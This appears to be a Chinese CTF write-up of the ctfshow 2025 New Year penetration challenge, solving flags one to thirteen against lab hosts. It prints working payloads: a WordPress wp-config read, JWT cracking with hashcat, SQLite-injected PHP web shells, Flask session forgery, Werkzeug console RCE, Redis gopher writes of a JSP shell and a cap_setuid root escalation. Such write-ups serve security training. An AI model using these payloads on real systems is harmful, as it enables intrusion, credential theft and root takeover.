2025ctfshow元旦渗透赛 第一章 flag1-压缩包 压缩包密码爆破
flag2-图片-密码 压缩包里面有个图片
PNG 文件的尾部标识符
49 45 4E 44 AE 42 60 82
提取出后边多余的文件base64解密👇出来个这个
1 2 3 4 5 6 7 if __name__ == '__main__': try: import secretMessageResponse except ImportError: import pip pip.main(['install', 'secretMessageResponse']) from secretMessageResponse import printMessage
拿python运行一下没出来一堆数据
去找库👇
pip show secretMessageResponse
crypto环境问题 from Crypto.PublicKey import RSA ModuleNotFoundError: No module named ‘Crypto’
求私钥 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from Crypto.PublicKey import RSA p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681 q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657 n = 633246888504573920779824237508007735589231666589188021171575950939940255140086052090801972411182075806200277922264916256376952068104942084262732765302869757002336862151158422906662985191392193462511289187123754337854684702016396996198789908170728175626225281406256476216079863574750768787169969475152717430903460149705597463505143799487488630064694962535355825378265518133414832135165998125004282912865895836379205933895029154287788824317000843771251331435939410389957572552746410933103347212260533351406876584798128116835102705770834548333327952204414218313396767348386545933700371706780732081128764732828398879654027694999061445888984652196057717761623666471390226500419047354546009526849190038055817008252022472857695300387827500818231719929626707573775972451255428059119840669826086027702546510213791864358183204530776020004866770536545695330324167569777791175170044812028227494966458864002660598592490354017639158027968836329598282419666463285900175674408026881052737148611395153194390130628356104784358804158581294733196703476913434055209441802708485723455322985654447400945734717510509951259155462497189459983874690099575241597111904193711108488616566486665053884629084564364205319797812148684173057523812840684555544241901417 e = 0x10001 # 计算其他相关参数 phi = (p - 1) * (q - 1) d = pow(e, -1, phi) # 生成私钥 key = RSA.construct((n, e, d, p, q)) private_key = key.export_key() print(private_key.decode('utf-8'))
求公钥
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization # 提供的PEM格式公钥 pem_key = b""" -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAmziayo9Tddo1FYdrtOsw yjLYJ5frYKEwm4rQTsKU8UcdnnDRgms+ZmStoqlH/qi6x+D1K3fvvioCnGZLFHZw BUqbgT5x+qUmUaVMll9FOT7ZJ05w8n8Ljqa1akzFMU5G7YbCr3vQwN63vwvD9/63 TDbXkJrv1fGl2rHpPwp5OPCUeCB3nIFIRCWHpJU7sHJqIP5vzV8KNJtbxgR+dhsz dg+NhoBDUpxoVN5lzSKr2TMOLFLZaQR9AWOV/aHV8gjTkTLDZfc+XlfhxiDMTQdi UTbk/tynpt+JFrDA8vL5/TOmuxgumqgXZIPGrIUbwloTYyHD/XXmvXu5KE8g3eMK gxNxuEKM5bMTESBK9A7Q2Kj3eNp0Rvb5Aleg7h8/YbQemGelY/o5xpUyHgHjsfNQ 3j/xhdhVCNVaXZF64V/YVpvC9Cq29F7qI+bl6FlN7zSpuHB3QgNS1uXOmjBCsA7y pZoWmdXeaLIO+I3kP48BBSmue4nidJifiK/kSOcZ0iegRXV1hyZ6pYdDE7hM5V5t 5tvayJ31zRQNT2ALAFeCDozVWELHTnphkPkQO+SOPglrVz0S1dXicqRofXWMj7PJ OFkBpWIX0aywMIh1woEAawUs3RM2pfLUNtqUTfodSCmWlwcpGrBWG5NACx7csPFt zWn8oPZfzL346at5DDIwD2kCAwEAAQ== -----END PUBLIC KEY----- """ # 从PEM格式公钥中加载公钥 public_key = serialization.load_pem_public_key( pem_key, backend=default_backend() ) # 提取模数(n)和公钥指数(e) n = public_key.public_numbers().n e = public_key.public_numbers().e print("模数(n):", n) print("公钥指数(e):", e)
解密脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import padding from cryptography.hazmat.primitives import hashes message = { "inputMessage_20241216" :'''gHgAsclUVPhWDv4S8Oa8SuRTDaj+V0dI4z2jrQwfvfSFWilWwMKwNULUI48UBLS2shZcm/yv2/e5Hq5VRDfXkdxCYQMdvdnvONtpm2yNiIaLpDV4Rs8fOXJ6kcaeT+mg4RkIIFgx35w4J1KgO72pSP8j1p+R9f9TNMafwJ91XmO4QTcOYkMKQMddKvhbyMXzJkSS0uZqEppNSIUnVX9b7m8PmMjV0uHShvb1Zc8UQWJWUJ3cOxwNasOeMQGxJrZXPkxIxDYzm3f0tXbCgvdgNZ8TQY7u+iCXjOtD6xnUsdSahnPq14BD30CilIfsG0r/klPHfxQ+psmHSX47Ylai0TtgfbHWJJ4lSo0ojMvTx6HYK8zmAoCmg4OGXDbv/IjJgYU1w24na0iXZCNtcjB9MLRNck00c20f/uS64Ss0Ixii8nmfsFOjQBCcIYN+HGmOnj5Uw8DVJrxlOmcfQciG3rzuIvYlbOdGMcyarTy2Ba7iZfoovYZObPscAwhNLWqbU4tuR78aOVxiXTFRY7+Y0x2eRT5sulcvB3vsKuDMlNrxaUgiFUohPBZGNsgQgyCPxxqk0NpUn0bbHLH+vBebjJxaim4AU28ctWW8xv7xpxVttb0EoohtK2cIHr79ep5XrU/rv4R58obD/o+QqI1Mrb4wwpX9tsL7ZbROw/MXJwM=''', "inputMessage_20240411" : '''Z93Khatj+AWZcpPwIqu8LzbJ8xb8CuVMI8okE0qwoQD2IC2lixg77mJZireOrbW7zFkDsk1hP67dROJZwVUDrYot2g5GxX/xy7lGjIblUX4iJVUtP4mHqZUgKROaLoh/gippMpP+8Ik2X/QRBx5gdhq0xam+wuVC+77/tyu8Fd/DohKbAMp8aaJsFr/W4mLDZ1gv4JK+2O3l+bAvpodBRTzb0ld5zD2ueYvjTudoDjdanQP1oVTH7pkDO2Vb+SsdIyTi2C410JEOF4Qm8mzVHtiOunOcLVpAlQsM6/LdhqsTNelXl/Myb84NGxwGWVmx6j2QejiL7S1hHeHlmQ9ExHeURPdZAvKhgMCemYXu3BGlFq3ydb5SkqwLFvM4vJ6XUBcWkHT8eijBFF6Y7YgOv9GRvBTnsAQhUBp4W4EAMtXkDdToG+S8ZO7El8Gh8jaWC49n5CuUBRz3z2GeOVbsBamfLV06IO5v78jGHXig4saEFKHvYSIGewyUCVQEGoIR5xOTJBTUTePAdvQjfg28vZZxFB/hIYNDUHkaek1Mg1UH5HWGgsCX1In5hSX/9eBkznEhzeWnJ1yMsYkj+ddN34DLQSrHc83geXMcoW3Ah3cAQG8E8bszvKL3hme+T5rOeENjkOAgYhf84k4YlxDskdwvzyu8HkE9CSaBpDP6lKI=''', "inputMessage_20240305" : '''ckDSthpl5DDJMpBE26Jqk8EjaSq7MUntdwLHPouwx6D38un6WQfLJ9wgDyjh9GA/ICJR7WrwWsVinr6y3u9w+ubMZ0mqmtnphzQraagk8NkKc1u1+qGp8llsud3C8mvJWa4GYa9KEhnACDHwppPKJDCfr1HKwPbR0NIi+1Aunmy6DeOKRkFwysnrSco5QiiC9+gdXFhQDmN9KEiYW6Pc3mWVbqFiJgRW3/Df6638oGPm6AUcgRnEWMKiluyN81frM9VNtCeJ64YrU6Rgx4D153YxNNQbLTcyCQMamHTrJnhxPojkuDqbEcU+iiN4offwrQyr4eEu9ecvmyD2w/n7pAOsVnqSzroBujVA+CK6Zq8Uie15mL5yWG9hD5ZcbSwnRmtqK3yl0Xl91hgn1JqcIEKtf+MnMQPr80uoxT3mz8IX8pyVnyyw1x6F+IK1I2G+5w6rUDjhzIbME5XB9hopwcswsXrMo9PP6/5Sz1noJrsu6k6WN8ZM0MyRIav+xuKP1+cYzlPSQZrMo3L4ieHQnBbsoyzGVf9QONMwaooGOrxu88ZWlGe8e7eyCzteeNSVOC2zqtQiwQJIgfp2UwTymA/cEjOICWVzUXwbE5wWUBPCLp2C/XWc82byrOHAFXHLOVKgolVToUpZ5uOvizgk/ahaxdGxGa9CrRyr6sf+goA=''', } from Crypto.PublicKey import RSA from Crypto.Util.number import * import base64 p = 31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681 q = 19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657 n = p * q e = 0x10001 d = inverse(e,(p - 1) * (q - 1)) pub = RSA.construct((n,e,d,p,q)) with open('out.pem','wb') as f: f.write(pub.exportKey('PEM')) with open('out.pem','rb') as f: pri_key = f.read() # print(pri_key) private_key = serialization.load_pem_private_key(pri_key,password=None,backend=default_backend()) for key, value in message.items(): encrypted = base64.b64decode(value) message = private_key.decrypt( encrypted, padding.OAEP( mgf=padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(), label=None ) ) print(base64.b64decode(message).decode())
得出
1 2 3 4 5 6 7 8 9 Park: 你的行动已经暴露,24小时内迅速撤离,销毁所有资料,将现有资料统一上传到【任务中心】 发送人:Dylan Park: 总部已经为你安排新的身份,请务必在3日内抵台,你的新身份是新竹县动物保护防疫所网络安全顾问,【任务中心】账号密码和你任职单位网站的数据库用户名密码一致,请尽快修改 发送人:Dylan Park: 【任务中心】网址已变更为 https://task.ctfer.com ,请注意修改浏览器地址栏中的链接 发送人:Dylan
flag3-wp漏洞+基础账户 从这突然好玩了起来
根据2的提示去获得账号密码
根据对应网进数据库查,网页源代码是wordpress的,
扫一扫查一查
1 https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b/
漏洞验证
1 ?aam-media=wp-config.php
1 ctfshow{hsinchug_wp1_Q.4Vyj8VCiedX1KYU5g05}
第二章 flag4-jwt伪造+第二个账户
查看电话号码的地方可以抓包,根据提示是jwt,key在火堆里面
4a4f7d6e8b5 ?0c7f
4a4f7d6e8b5e3a0c7f
爆破
1 2 3 hashcat -a 3 -m 16500 hash.txt --custom-charset1=?l?d 4a4f7d6e8b5?1?1?10c7f eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoc2luY2h1Z193cDEiLCJleHAiOjE3MzY3NzIyNTV9._fw255qGHn4l9BtB6Uw2AifVgb9Z5xd7Grl41Q7S7LU
出结果
flag5-文件读取+root账户+app.py.bak(含密码 拿新的身份去查看新的admin功能,抓个包,一个是遍历文件,一个是查看文件
访问init_users.json获得flag
flag6-ssrf+secret_key 在Server Info菜单发现内网IP地址
有个download task file的页面可以试试内网访问
ctfshow{0x8F7C71E8E82E4D1E}
第三章 flag7-ssrf传码,获取shell sqllite写码
1 ?dsn=sqlite:shell.php&username=aaa&password=bbb&query=create table "aaa"(name TEXT DEFAULT "<?php file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");
没好使,用的下边的
1 2 3 4 5 http://172.2.198.5/?username=1%26password=1%26query=CREATE TABLE users (name TEXT);%26dsn=sqlite:b.php http://172.2.198.5/?username=1%26password=1%26query=INSERT INTO users (name) VALUES ('<?php file_put_contents("4.php","<?php system(\$_GET[0]);?>");?>');%26dsn=sqlite:b.php http://172.2.198.5/b.php http://172.2.198.5/4.php?0=ls; http://172.2.198.5/4.php?0=cat config.php;
法二 原内容
1 %3fdsn=sqlite:shell.php%26username=aaa%26password=bbb%26query=create%20table%20"aaa"%20(name%20TEXT%20DEFAULT%20"<?php%20file_put_contents('1.php','<?php eval($_GET[1]);?>');?>");
输入
1 http://172.2.198.5/%3fdsn=sqlite:shell.php%26username=bbb%26password=bbb%26query=create%20table%20%22bbb%22%20(name%20TEXT%20DEFAULT%20%22%3C?php%20file_put_contents(%271.php%27,%27%3C?php%20eval($_GET[1]);?%3E%27);?%3E%22);
再访问shell.php然后虽然报错但是码写进去了,然后去1.php
flag8-眼看 根目录有个secret.txt打开,里面有邮箱账号+密码的base64
网易邮箱登录可以看到81192
第四章 flag9-session伪造-ssrf+key 打.6:8888进去就会给个session,访问/key会拒绝,伪造一个
根据flag5那的py.bak源代码里的伪造一个
1 python flask_session_cookie_manager3.py decode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -c eyJ1c2VyIjoiZ3Vlc3QifQ.Z4dF3w.FEE9qzWhV0dbFQ-ZNfYo7eqpr6o
1 python flask_session_cookie_manager3.py encode -s 3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5 -t "{'user': 'admin'}"
1 eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY
在通过刚才获取的shell去ssrf
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/key"
flag10-flask日志文件getshell 思路
查看werkzeug的源码
werkzeug是Python实现的WSGI规范的使用函数库。
WSGI是一种服务器和客户端交互的接口规范
curl
-v详细模式 **-c cookie.txt**:
这个选项指定 curl 在完成请求后,将从服务器返回的 Cookies 保存到 cookie.txt 文件中。
**-b**:
这个选项用来指定 curl 发送请求时使用 指定的 Cookie 文件。
操作 法三 附上脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import base64 import requests import urllib.parse while True: data = input("> ") # data = urllib.parse.quote(data) # python_shell = 'curl --cookie "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z3kddg.CjbNhdNFa_7H--igibxBzM2omNk;__wzd2fb5743f98b45463400e=1736152460|4bfc86e353c8" "http://172.2.252.6:8888/console?__debugger__=yes&s=eABh7cMeNgMKri1DSi4w&cmd={}&frm=1"'.format(data) # python_shell = base64.b64encode(python_shell.encode()).decode() data = base64.b64encode(data.encode()).decode() # normal_shell = 'echo "' + data + '" | base64 -d | sh' normal_shell=data # url = "https://543f943e-6f90-43b4-bfc8-ee86d2fb3f34.challenge.ctf.show/downloadTaskFile?url=http://172.2.239.5/1.php?1=phpinfo();" url = "http://6bcb3e8b-f3e3-4103-86b7-e8d9a9df8f92.challenge.ctf.show/downloadTaskFile?url=http://172.2.198.5/1.php?1=system(base64_decode(\""+normal_shell+"\"));" response = requests.get(url, verify=False, headers={'Authorization': "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJkeWxhbiIsImV4cCI6MTczNzAwNTIwOH0.6I2CU7u2c96zkz_HhdEg2NvuvwdvLSsAjfIom3b80Jw"}) try: # print(url) # print(response.json()) # print(response.json()["url"]) print(response.json()["file_content"]) except: print("Error") continue
修改日志
1 /set_log_option%3flogName=werkzeug%2526logFile=main.log
获取console的密码
1 2 3 /console 21hr1yWBaAg5kQrHGHW
写入
1 curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl"
查看
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
获取pin码
1 2 /set_log_option?__debugger__=yes&cmd=printpin&f=console.png&s=21hr1yWBaAg5kQrHGHWl 143-535-858
验证
1 curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"
保存cookie
1 curl -c cookie.txt -v -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=pinauth&pin=143-535-858&s=21hr1yWBaAg5kQrHGHWl"
利用cookie命令执行
1 curl -v -b "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=__import__('os').system('''cat%20\/etc\/passwd>.\/log\/main2.log''')&frm=0&s=21hr1yWBaAg5kQrHGHWl"
没写进去,换shell
1 http://172.2.198.5/1.php?1=system(base64_decode('Y3VybCAgLXYgLWIgICJfX3d6ZDgwNWJkYTg2MDM3ODdhMTI0MmNkPTE3MzY5MjY0MDJ8MTJhMzJjOTc4YTI2IiAiaHR0cDovLzE3Mi4yLjE5OC42Ojg4ODgvY29uc29sZT9fX2RlYnVnZ2VyX189eWVzJmNtZD1vcy5zeXN0ZW0oJycnY2F0JTIwXC9ldGNcL3Bhc3N3ZD4uXC9sb2dcL21haW4yLmxvZycnJykmZnJtPTAmcz0yMWhyMXlXQmFBZzVrUXJIR0hXbCI='));
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main2.log"
读取
1 http://172.2.198.5/4.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
1 curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z4dItA.yrEFxBrghAW5vMoONE3fPUzMHAY" "http://172.2.198.6:8888/get_log_content?logFile=main.log"
直接读
1 curl -v -b "__wzd805bda8603787a1242cd=1736926402|12a32c978a26" "http://172.2.198.6:8888/console?__debugger__=yes&cmd=print(__import__('os').popen('cat%20\/etc\/passwd').read())&frm=0&s=21hr1yWBaAg5kQrHGHWl"
第五章 flag11 直接访问7的8080端口,是Jetty Server
敏感文件读取
curl -v "dict://172.2.182.7:6380/auth:ctfshow_2025"
1 2 3 4 5 2. 再传码 1. ``` http://172.2.182.5/1.php?1=system(base64_decode('Y3VybCAgLXYgICJnb3BoZXI6Ly8xNzIuMi4xODIuNzo2MzgwL19hdXRoJTIwY3Rmc2hvd18yMDI1JTBBc2V0JTIwbWFycyUyMCUyMiUzQyUyNSUyMFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3JTIwU3RyaW5nJTVCJTVEJTdCJTVDJTIyc2glNUMlMjIlMkMlNUMlMjItYyU1QyUyMiUyQ3JlcXVlc3QuZ2V0UGFyYW1ldGVyKCU1QyUyMmNtZCU1QyUyMiklN0QpJTNCJTI1JTNFJTIyJTBBY29uZmlnJTIwc2V0JTIwZGlyJTIwJTJGb3B0JTJGamV0dHklMkZ3ZWJhcHBzJTJGUk9PVCUyRiUwQWNvbmZpZyUyMHNldCUyMGRiZmlsZW5hbWUlMjAyLmpzcCUwQXNhdmUlMEFxdWl0Ig=='));
读取文件
发现命令没有回显,写入web服务目录/opt/jetty/webapps/ROOT/
2.jsp?cmd=ls%20/>/opt/jetty/webapps/ROOT/success.txt
1 2 3 3. ``` 2.jsp?cmd=cat%20/dylan.txt>/opt/jetty/webapps/ROOT/success.txt
flag13
查询cap权限
getcap%20-r%20/%202>/dev/null>/opt/jetty/webapps/ROOT/success.txt
1 2 3 2. ``` /usr/local/openjdk-8/bin/java = cap_setuid+ep
setuid提权
写setuid.c
2.jsp?cmd=echo%20"I2luY2x1ZGUgPGpuaS5oPgovLzExMTExMTExMTExMjIKI2luY2x1ZGUgPHVuaXN0ZC5oPgoKSk5JRVhQT1JUIGppbnQgSk5JQ0FMTCBKYXZhX1NldFVJRF9zZXRVSUQoSk5JRW52ICplbnYsIGpvYmplY3Qgb2JqLCBqaW50IHVpZCkgewogICAgcmV0dXJuIHNldHVpZCh1aWQpOwp9"%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.c
1 2 3 4 5 6 7 8 2. ```C #include <jni.h> #include <unistd.h> JNIEXPORT jint JNICALL Java_SetUID_setUID(JNIEnv *env, jobject obj, jint uid) { return setuid(uid); }
setuid.java
2.jsp?cmd=echo%20"cHVibGljIGNsYXNzIFNldFVJRCB7CiAgICBzdGF0aWMgewogICAgICAgIFN5c3RlbS5sb2FkTGlicmFyeSgiU2V0VUlEIik7IAogICAgfQoKICAgIHB1YmxpYyBuYXRpdmUgaW50IHNldFVJRChpbnQgdWlkKTsgCiAgLy9hCiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBTZXRVSUQgc2V0VUlEID0gbmV3IFNldFVJRCgpOwogICAgICAgIGludCByZXN1bHQgPSBzZXRVSUQuc2V0VUlEKDApOyAKICAgICAgICBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKG5ldyBTdHJpbmdbXXsic2giLCItYyIsImNhdCAvcm9vdC8qLnR4dD4vb3B0L2pldHR5L3dlYmFwcHMvUk9PVC9yb290LnR4dCJ9KTsKICAgIH0KfQ=="%20|base64%20-d%20>/opt/jetty/webapps/ROOT/SetUID.java
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 2. ``` public class SetUID { static { System.loadLibrary("SetUID"); } public native int setUID(int uid); public static void main(String[] args) throws Exception { SetUID setUID = new SetUID(); int result = setUID.setUID(0); Runtime.getRuntime.exec(new String[]{"sh","-c","cat /root/*.txt>/opt/jetty/webapps/ROOT/root.txt"}); } }
编译
2.jsp?cmd=javac%20/opt/jetty/webapps/ROOT/SetUID.java
1 2 3 2. ```Python 2.jsp?cmd=gcc%20-shared%20-fPIC%20-o%20/opt/jetty/webapps/ROOT/libSetUID.so%20-I${JAVA_HOME}/include%20-I${JAVA_HOME}/include/linux%20/opt/jetty/webapps/ROOT/SetUID.c
执行
2.jsp?cmd=java%20-Djava.library.path=/opt/jetty/webapps/ROOT/%20-cp%20/opt/jetty/webapps/ROOT/%20SetUID
https://chenxi9981.github.io/ctfshow_%E5%85%83%E6%97%A6%E6%9D%AF/
https://www.cnblogs.com/LAMENTXU/articles/
https://ysynrh77rj.feishu.cn/docx/F3nJdGJHjo1DSBx8c2TcecLrnvh
## 评价
挺难的,感觉我自己做不能出,
疑惑点是flag10这,还有flag13这,13是真不会,记住payload下回直接用了
